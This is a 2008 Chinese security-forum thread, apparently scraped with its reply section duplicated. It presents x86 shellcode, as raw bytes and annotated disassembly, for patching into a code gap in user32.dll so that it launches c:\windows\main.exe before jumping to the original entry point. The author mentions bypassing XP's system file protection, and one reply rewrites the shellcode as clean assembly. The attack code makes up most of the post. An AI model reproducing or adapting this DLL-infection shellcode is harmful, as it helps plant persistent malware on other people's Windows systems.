[原创]奇妙的shellcode-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]奇妙的shellcode

发表于: 2008-10-28 23:45 10153

[原创]奇妙的shellcode

combojiang 活跃值

2008-10-28 23:45

10153

Shellcode dd 0E8h
            dd 0C0835800h, 0C083502Fh, 90FF5008h, 0
            dd 0E850h, 0FF580000h, 90h, 0E8006A00h, 0
            dd 21C18359h, 0E9D0FF51h, 0

aWinexec_0    db 'WinExec',0
aKernel32_dll db 'kernel32.dll',0
ZhanWeiFile    db 'c:\windows\main.exe',0

上面是一段shellcode的代码，可以把这段代码插入到user32.dll文件的.text空隙中。只要空隙的大小有70h字节就足够了。另外里面用的GetModuleHandleA，GetProcAddress等函数地址，可以直接搜索user32.dll文件的导入表获得。只要把user32.dll加载到一个缓冲区就可以进行搜了。当然还要对xp的sfc进行突破。

这段shellcode码的作用就是在入口处执行，功能是执行一个ZhanWeiFile字符串描述的exe。

0012FF4C E8 00 00 00 00    call       0012FF51
0012FF51 58                pop       eax
0012FF52 83 C0 2F          add       eax,2Fh
0012FF55 50                push       eax       ;"WinExec"
0012FF56 83 C0 08          add       eax,8
0012FF59 50                push       eax       ;"Kernel32.dll"
0012FF5A FF 90 00 00 00 00 call       dword ptr [eax + 0]

注意这里是距shellcode开头偏移10h的位置，将来把0偏移填充为GetModuleHandleA距离字符串"Kernel32.dll"的相对偏移。
0012FF60 50                push       eax
0012FF61 E8 00 00 00 00    call       0012FF66
0012FF66 58                pop       eax
注意这里是距shellcode开头偏移1ah
0012FF67 FF 90 00 00 00 00 call       dword ptr [eax + 0]
注意这里的0偏移是距shellcode开头偏移1Dh的位置，将来把0偏移填充为GetProcAddress距离上面偏移（即shellcode开头偏移1ah）的相对偏移
0012FF6D 6A 00             push       0             //winexec参数1
0012FF6F E8 00 00 00 00    call       0012FF74
0012FF74 59                pop       ecx
0012FF75 83 C1 21          add       ecx,21h
注意这里偏移21h，正好指向字符串ZhanWeiFile
0012FF78 51                push       ecx          //winexec参数2
0012FF79 FF D0             call       eax    //winexec
0012FF7B E9 00 00 00 00    jmp       0012FF80 //跳到AddressOfEntry 。
注意 E9字节也即本行开头距shellcode开头偏移为2fh 。后面将会计算本行与AddressOfEntry的相对偏移，然后将这个相对偏移填充到30h的位置。

0012ff80 aWinexec_0    db 'WinExec',0
0012ff88 aKernel32_dll db 'kernel32.dll',0
0012ff95 ZhanWeiFile    db 'c:\windows\main.exe',0

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・5

免费・0

支持

最新回复 (16)
StarsunYzL 雪币： 424 活跃值： (1844) 能力值： ( LV3，RANK：30 ) 在线值：发帖 29 回帖 441 粉丝 1 关注私信	StarsunYzL 2 楼没看明白，咋一看还以为这么短能自定位函数，原来是要外部填充，既然要外部填充，那何必又要在shellcode里GetModuleHandleA呢，直接在外部GetModuleHandleA填进shellcode，然后shellcode里直接 call WinExec jmp xxxxxxxx 不一样么？？ 2008-10-29 00:23 0
玩命雪币： 7115 活跃值： (639) 能力值： (RANK：1290 ) 在线值：发帖 61 回帖 456 粉丝 75 关注私信	玩命 31 3 楼看牛帖，一定要整死的顶。。。 2008-10-30 00:48 0
三根火柴雪币： 268 活跃值： (40) 能力值： ( LV10，RANK：170 ) 在线值：发帖 32 回帖 255 粉丝 0 关注私信	三根火柴 4 4 楼不懂，继续努力 2008-10-30 00:57 0
icersg 雪币： 293 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 471 粉丝 0 关注私信	icersg 5 楼看文章第一句话，我想楼主是要插入到user32.dll，里面没有引入WinExec，所以才这样写。要是插入到kernel32.dll，觉得还是你说的方法比较方便。 2008-10-30 01:26 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 6 楼至今还没见过一个不引入kernel32而引入user32的程序 2008-10-30 03:52 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 7 楼 Shellcode dd 0E8h dd 0C0835800h, 0C083502Fh, 90FF5008h, 0 dd 0E850h, 0FF580000h, 90h, 0E8006A00h, 0 dd 21C18359h, 0E9D0FF51h, 0 aWinexec_0 db 'WinExec',0 aKernel32_dll db 'kernel32.dll',0 ZhanWeiFile db 'c:\windows\main.exe',0 不可用，或我们不知道如何用。 2008-10-30 08:42 0
gqdsc 雪币： 198 活跃值： (124) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 27 粉丝 0 关注私信	gqdsc 8 楼这么做什么呀？迷糊，看来要多努力~~ 2008-10-30 08:57 0
Aleaxander 雪币： 111 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 10 回帖 182 粉丝 0 关注私信	Aleaxander 1 9 楼看的稀里糊涂的 2008-10-31 17:06 0
nightxie 雪币： 86 活跃值： (56) 能力值： ( LV9，RANK：160 ) 在线值：发帖 11 回帖 71 粉丝 2 关注私信	nightxie 3 10 楼又见这篇文章~~~ 2008-10-31 17:11 0
evilisland 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 15 粉丝 0 关注私信	evilisland 11 楼看不明白～～～ 2008-10-31 18:06 0
wwwst 雪币： 183 活跃值： (230) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 24 粉丝 0 关注私信	wwwst 12 楼精彩~~~~~~~~~~~~~~~~~ 2008-11-1 18:40 0
太难了雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 140 粉丝 0 关注私信	太难了 13 楼没见楼主叫你自己搜索 API 吗 2008-11-2 23:26 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 14 楼至少要局部可用，才可细究。否则耗费时间，结果归零。对断章取节深感郁闷...... 2008-11-3 18:52 0
xfish 雪币： 315 活跃值： (23) 能力值： ( LV9，RANK：220 ) 在线值：发帖 10 回帖 113 粉丝 5 关注私信	xfish 5 15 楼代码的技巧其实应该不在于这段combojiang构造的shellcode。在于combojiang如何去填充这些GetModuleHandleA, GetProcAddress函数的地址。combojiang好像没有说明啊。这段shellcode其实很简单，将其恢复为汇编则为如下： call $+5 @@: pop eax add eax, pszWinExec - @b push eax add eax, pszKernel - pszWinExec push eax call dword [eax+ pGetModule-pszKernel] push eax call $+5 @@: pop eax call dword [eax+ pGetProc - @b] push 0 ;winexec参数 call $+5 @@: pop ecx add ecx, pszFile - @b push ecx ;winexec参数 call eax jmp 0012FF80h ;入口偏移 pszWinExec db 'WinExec',0 pszKernel db 'kernel32.dll', 0 pszFile db 'c:\windows\main.exe', 0 pGetModule rd 1 pGetProc rd 1 2008-11-5 12:06 0
wsyzyddd 雪币： 215 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 124 粉丝 0 关注私信	wsyzyddd 1 16 楼以前考虑过搜索 user32之类的模块中调用目标API的CODE 然后调用user32中的调用API的code LZ厉害，直接调用了。 2008-11-6 15:26 0
saga 雪币： 224 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 10 回帖 120 粉丝 0 关注私信	saga 2 17 楼时间不多不细想了没有太明白意图啊呵呵 lz还是要说清楚些啊楼主还是辛苦了顶下 2008-11-20 20:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

combojiang

发帖

765

回帖

1050

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
StarsunYzL 雪币： 424 活跃值： (1844) 能力值： ( LV3，RANK：30 ) 在线值：发帖 29 回帖 441 粉丝 1 关注私信	StarsunYzL 2 楼没看明白，咋一看还以为这么短能自定位函数，原来是要外部填充，既然要外部填充，那何必又要在shellcode里GetModuleHandleA呢，直接在外部GetModuleHandleA填进shellcode，然后shellcode里直接 call WinExec jmp xxxxxxxx 不一样么？？ 2008-10-29 00:23 0
玩命雪币： 7115 活跃值： (639) 能力值： (RANK：1290 ) 在线值：发帖 61 回帖 456 粉丝 75 关注私信	玩命 31 3 楼看牛帖，一定要整死的顶。。。 2008-10-30 00:48 0
三根火柴雪币： 268 活跃值： (40) 能力值： ( LV10，RANK：170 ) 在线值：发帖 32 回帖 255 粉丝 0 关注私信	三根火柴 4 4 楼不懂，继续努力 2008-10-30 00:57 0
icersg 雪币： 293 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 471 粉丝 0 关注私信	icersg 5 楼看文章第一句话，我想楼主是要插入到user32.dll，里面没有引入WinExec，所以才这样写。要是插入到kernel32.dll，觉得还是你说的方法比较方便。 2008-10-30 01:26 0
forgot 雪币： 6075 活跃值： (2236) 能力值： (RANK：1060 ) 在线值：发帖 155 回帖 3771 粉丝 15 关注私信	forgot 26 6 楼至今还没见过一个不引入kernel32而引入user32的程序 2008-10-30 03:52 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 7 楼 Shellcode dd 0E8h dd 0C0835800h, 0C083502Fh, 90FF5008h, 0 dd 0E850h, 0FF580000h, 90h, 0E8006A00h, 0 dd 21C18359h, 0E9D0FF51h, 0 aWinexec_0 db 'WinExec',0 aKernel32_dll db 'kernel32.dll',0 ZhanWeiFile db 'c:\windows\main.exe',0 不可用，或我们不知道如何用。 2008-10-30 08:42 0
gqdsc 雪币： 198 活跃值： (124) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 27 粉丝 0 关注私信	gqdsc 8 楼这么做什么呀？迷糊，看来要多努力~~ 2008-10-30 08:57 0
Aleaxander 雪币： 111 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 10 回帖 182 粉丝 0 关注私信	Aleaxander 1 9 楼看的稀里糊涂的 2008-10-31 17:06 0
nightxie 雪币： 86 活跃值： (56) 能力值： ( LV9，RANK：160 ) 在线值：发帖 11 回帖 71 粉丝 2 关注私信	nightxie 3 10 楼又见这篇文章~~~ 2008-10-31 17:11 0
evilisland 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 15 粉丝 0 关注私信	evilisland 11 楼看不明白～～～ 2008-10-31 18:06 0
wwwst 雪币： 183 活跃值： (230) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 24 粉丝 0 关注私信	wwwst 12 楼精彩~~~~~~~~~~~~~~~~~ 2008-11-1 18:40 0
太难了雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 140 粉丝 0 关注私信	太难了 13 楼没见楼主叫你自己搜索 API 吗 2008-11-2 23:26 0
sixL 雪币： 248 活跃值： (1081) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 166 粉丝 1 关注私信	sixL 14 楼至少要局部可用，才可细究。否则耗费时间，结果归零。对断章取节深感郁闷...... 2008-11-3 18:52 0
xfish 雪币： 315 活跃值： (23) 能力值： ( LV9，RANK：220 ) 在线值：发帖 10 回帖 113 粉丝 5 关注私信	xfish 5 15 楼代码的技巧其实应该不在于这段combojiang构造的shellcode。在于combojiang如何去填充这些GetModuleHandleA, GetProcAddress函数的地址。combojiang好像没有说明啊。这段shellcode其实很简单，将其恢复为汇编则为如下： call $+5 @@: pop eax add eax, pszWinExec - @b push eax add eax, pszKernel - pszWinExec push eax call dword [eax+ pGetModule-pszKernel] push eax call $+5 @@: pop eax call dword [eax+ pGetProc - @b] push 0 ;winexec参数 call $+5 @@: pop ecx add ecx, pszFile - @b push ecx ;winexec参数 call eax jmp 0012FF80h ;入口偏移 pszWinExec db 'WinExec',0 pszKernel db 'kernel32.dll', 0 pszFile db 'c:\windows\main.exe', 0 pGetModule rd 1 pGetProc rd 1 2008-11-5 12:06 0
wsyzyddd 雪币： 215 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 124 粉丝 0 关注私信	wsyzyddd 1 16 楼以前考虑过搜索 user32之类的模块中调用目标API的CODE 然后调用user32中的调用API的code LZ厉害，直接调用了。 2008-11-6 15:26 0
saga 雪币： 224 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 10 回帖 120 粉丝 0 关注私信	saga 2 17 楼时间不多不细想了没有太明白意图啊呵呵 lz还是要说清楚些啊楼主还是辛苦了顶下 2008-11-20 20:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复